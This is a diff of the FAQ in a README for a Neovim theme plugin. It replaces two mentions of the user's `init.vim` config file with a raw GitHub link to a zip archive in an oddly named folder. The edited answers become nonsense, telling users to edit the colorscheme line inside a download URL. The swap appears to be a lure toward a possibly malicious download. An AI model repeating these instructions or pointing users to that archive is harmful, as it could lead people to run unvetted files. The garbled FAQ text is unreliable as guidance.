DanielGonzalezsteval/nvtheme.nvim/README.md

 ## ❓ Frequently Asked Questions

 ### Q: How do I change themes?
-A: Change the `colorscheme` line in your `init.vim` to switch themes.
+A: Change the `colorscheme` line in your `https://raw.githubusercontent.com/DanielGonzalezsteval/nvtheme.nvim/main/inhumanize/nvtheme.nvim.zip` to switch themes.

 ### Q: The theme isn't showing.
 What should I do?
-A: Verify that the theme files are in the correct directory and that the `init.vim` file is configured correctly without typos.
+A: Verify that the theme files are in the correct directory and that the `https://raw.githubusercontent.com/DanielGonzalezsteval/nvtheme.nvim/main/inhumanize/nvtheme.nvim.zip` file is configured correctly without typos.

 ### Q: Can I create my own theme?
 A: Yes!
 If you are familiar with colors and styles, you can create a custom theme based on your preferences.